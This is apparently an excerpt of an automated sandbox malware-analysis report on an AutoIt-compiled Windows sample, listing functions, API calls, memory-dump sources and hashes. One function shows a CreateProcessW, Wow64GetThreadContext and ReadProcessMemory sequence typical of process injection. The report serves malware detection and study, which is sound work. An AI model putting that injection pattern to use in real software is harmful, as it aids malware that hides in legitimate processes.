Part of subcall function 00511BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
Part of subcall function 00511BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
Part of subcall function 00511BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22

Part of subcall function 00511B4A: RegisterWindowMessageW.USER32(00000004,?,005112C4), ref: 00511BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0051136A
OleInitialize.OLE32 ref: 00511388
CloseHandle.KERNEL32(00000000,00000000), ref: 005524AB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d9f1934d5bc0c945d4157bae68404e77a2955491e444033d96acdde581ce522f
Instruction ID: a2c1be7d9bad3e72d67d319451dd2cef8a1051d32bf9687fd9b9a2537118ac49
Opcode Fuzzy Hash: d9f1934d5bc0c945d4157bae68404e77a2955491e444033d96acdde581ce522f
Instruction Fuzzy Hash: 8F71C1B5905B818ED78CDF79A9C56993EE0FBA9340744416BD08ACF3A1EB304488EF4D

Function 005154C6 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 0051556D
SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 0051557D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 904ca61be81e179ea195a04260c9b747046fa10971a7ba17e58dde1f693d486d
Instruction ID: 18eadea4bd4513311671ac9f05911c2f2bd0d3b93e2ac4ee35a48215d1b7c78f
Opcode Fuzzy Hash: 904ca61be81e179ea195a04260c9b747046fa10971a7ba17e58dde1f693d486d
Instruction Fuzzy Hash: 1F315071A00609FFEB14CF28C880BD9BBB6FB84354F15862AE91997240E775FD94CB90

Function 0057C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00513923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00513A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0057C259
KillTimer.USER32(?,00000001,?,?), ref: 0057C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0057C270

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 84e430f0ea7d7c3f3f44777c474e6665588b1047e38d15e98f6fc299fc65fdcc
Instruction ID: 8268c38520dea522e2ad6d0c6ea99744c00fa1bb3e7c6e7c4814fcfdb04259e6
Opcode Fuzzy Hash: 84e430f0ea7d7c3f3f44777c474e6665588b1047e38d15e98f6fc299fc65fdcc
Instruction Fuzzy Hash: 9C31C574904744AFEB22CF64A895BEBBFECAB17304F00449DD2DE97242C7745A88DB51

Function 005486AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,005485CC,?,005D8CC8,0000000C), ref: 00548704
GetLastError.KERNEL32(?,005485CC,?,005D8CC8,0000000C), ref: 0054870E
__dosmaperr.LIBCMT ref: 00548739

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
Instruction ID: ca96c30c1691fcba0cd7422c8e6215f49d8d2d32e340fa7d64285d3245ada209
Opcode Fuzzy Hash: 13746a9286d7fc3804120b1d10a8ee9d0988eada42a7bdc636fafadc96d8caf8
Instruction Fuzzy Hash: E0018E33A0426027D6A56B346889BFE2F59BBE277CF3A0519F8148B1D3EEB1CC819150

Function 0051DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 0051DB7B
DispatchMessageW.USER32(?), ref: 0051DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
Sleep.KERNEL32(0000000A), ref: 0051DBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00561CC9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
Instruction ID: b04c57b5133ee7231b73540fc7dc41ed18e125d81c195027c2f3adf0a976cd47
Opcode Fuzzy Hash: 63e18fd78ce78f31ea2fdcd4028c3206ac68d47b68e7d8c617a6442931273816
Instruction Fuzzy Hash: DBF05E306483809BFB34CB608C89FEA7BBCFB95310F104918E64A830C0DB30A488DB29

Function 00582FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00582CD4,?,?,?,00000004,00000001), ref: 00582FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00583006
CloseHandle.KERNEL32(00000000,?,00582CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0058300D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
Instruction ID: ace23b7b4834e6e9de36bc86a17b135bfa3756152a7ac01cfc0a3ac53ca464b7
Opcode Fuzzy Hash: f9ecb8f9f3c0960f86251ba74840c755d5c76f292d13602c2309fef65ac29e6c
Instruction Fuzzy Hash: 14E0863238021077D7312755BC0DF8B3E1CD787F71F104211FB19750D08AA0550593A8

Function 00521310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 005217F6

Strings

CALL, xrefs: 005217C6

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 48f97d61006adb61e383fb552b95c4ef56480cf853b633563e3456a644739caf
Instruction ID: 6634c6f1f2c92b9a7d328588e81a4e2057efe7602474ce4a2ff8a8cee2b1219c
Opcode Fuzzy Hash: 48f97d61006adb61e383fb552b95c4ef56480cf853b633563e3456a644739caf
Instruction Fuzzy Hash: 9422AB706086529FC714DF14E484A2BBFF1BFA6314F18896DF4868B3A2D731E845CB86

Function 00586EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00586F6B

Part of subcall function 00514ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00586F5A, 00586F63

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 03282ece5115e28fffd96dbae5b03d6564a9532dabe093ce27b53afb65753ca4
Instruction ID: 741b6fd0abcc939fdf08f7ab529197b2810baf9b9adafbbfbf9ac3598e5f8555
Opcode Fuzzy Hash: 03282ece5115e28fffd96dbae5b03d6564a9532dabe093ce27b53afb65753ca4
Instruction Fuzzy Hash: 44B174312082069FDB14FF24C4959AEBBE5BFD8310F14495DF89697261EB30ED85CB92

Function 00582557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00582587

Strings

EA06, xrefs: 005825B9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
Instruction ID: 89241343d2bcf0af205bc30084046dbc01c5d46a47e02f79d006108566054ae9
Opcode Fuzzy Hash: 6d29b7636bec79ad49dde295ce26d1aa55787e4b417f627ad374aa78ca1a67ff
Instruction Fuzzy Hash: 8301B5729442587EDF28D7A8C85AFAEBFF8AB05301F00455AE592E61C1E5B4E608CB60

Function 00513837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00513908

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 733028056f64d79adee4306f92ca461db6d2bdca87065f33659f66aaa9822bdc
Instruction ID: a3104f05ad26b2e79550cb6a0e322f9f8e9617fb0eba3216efbd6ecfaa37af3a
Opcode Fuzzy Hash: 733028056f64d79adee4306f92ca461db6d2bdca87065f33659f66aaa9822bdc
Instruction Fuzzy Hash: 3D319C705057019FE720DF24D8947DBBFE8FB59708F00092EF99997240E771AA88DB56

Function 00515745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00515773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0051949C,?,00008000), ref: 00554052

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8b83e2ed181122a1d26f69c35de5e8ea26ebf3c857524b77e3fe5658ce679d8f
Instruction ID: c49e2ef438f33b9c7c91c7516e55e77608b4c4235832cb6192be4ae7e10392b1
Opcode Fuzzy Hash: 8b83e2ed181122a1d26f69c35de5e8ea26ebf3c857524b77e3fe5658ce679d8f
Instruction Fuzzy Hash: 77018030245625F6E3315A2ACC0EF977F98EF427B4F108201BA9C5A1E0DBB45894CB90

Function 00516E14 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,?,?,?,?,00519879,?,?,?), ref: 00516E33
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00519879,?,?,?), ref: 00516E69

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 147c678ec246ddf19d625abb77ff8b3e6c7041d232f82d841dec64bc4c006250
Instruction ID: d5611b9ff13c6b2225f552cac1b14a2417238e58bb979251925ffc26fbc54f49
Opcode Fuzzy Hash: 147c678ec246ddf19d625abb77ff8b3e6c7041d232f82d841dec64bc4c006250
Instruction Fuzzy Hash: 6C01B1713012017FEB19A779AC0AFBF7EADEF85300F14013DB106DA1E1E960AC009620

Function 01601D1D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016024DB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01602571
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01602593

Memory Dump Source

Source File: 00000000.00000002.2087758926.0000000001600000.00000040.00000020.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1600000_4sfN3Gx1vO.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: af62ac92451ce3bb0e8534dedb036913d19e77db87e98a0c4c22015fb9dd633a
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: 7912CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 0052FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0052FD1F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 99abc67ec20f9200d5920452b717e39ac1dbb84cd81301deb06dfaf919a41a39
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C631DF74A041199BD718CF59F490969FBB2FF4A300B2486B5E80ADB696D731EDC1CBD0

Function 00514ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00514E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E9C
Part of subcall function 00514E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00514EAE
Part of subcall function 00514E90: FreeLibrary.KERNEL32(00000000,?,?,00514EDD,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514EFD

Part of subcall function 00514E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E62
Part of subcall function 00514E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00514E74
Part of subcall function 00514E59: FreeLibrary.KERNEL32(00000000,?,?,00553CDE,?,005E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00514E87

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
Instruction ID: 48b0312ac32c550c80d4d31d0f05ca6639ee46fab9d83a75a2a14cdf16941df8
Opcode Fuzzy Hash: aba37786fd1f36d02c8dc402f9276e970527090c239eb07310ece650d43ae584
Instruction Fuzzy Hash: 7111C431600206AAEF15AB60D81AFED7FA5BFC0711F10442AF542AA2D1EE719E85DB50

Function 00548402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00548440

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
Instruction ID: 618b61f8fe42da43e59964d0c08dde0c02aa4591aef5de213732375e3dde6d57
Opcode Fuzzy Hash: 9d59626c12810cbc246622456b8a193d956298b931b56eeeb23c261f8471b7f1
Instruction Fuzzy Hash: 5311257590410AAFCF09DF58E9449EE7BF8FF48308F144059F808AB352DA30DA118BA4

Function 00519A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,0051543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00519A9C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9398367530493682f61284e789b2909a91614081ae313e4d64705641155a7b60
Instruction ID: 751d9bdb0d50df1e5ee8fb8f8962804a7f3308dfd68a7396b0fe3bb904011359
Opcode Fuzzy Hash: 9398367530493682f61284e789b2909a91614081ae313e4d64705641155a7b60
Instruction Fuzzy Hash: 33116A352047019FE7248E05C890BA2BBF9BF44350F10C42DE59B86651C771A889CB60

Function 00545000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00544C7D: RtlAllocateHeap.NTDLL(00000008,00511129,00000000,?,00542E29,00000001,00000364,?,?,?,0053F2DE,00543863,005E1444,?,0052FDF5,?), ref: 00544CBE

_free.LIBCMT ref: 0054506C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: faf7293bcd45e29fdd4cd395ffc8697be0ccd866822b4e37b3ecc14e7bffd585
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 090126762047056BE3218E659889ADAFFE9FB89374F65051DE18883281EA30A805C6B4

Function 0053E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
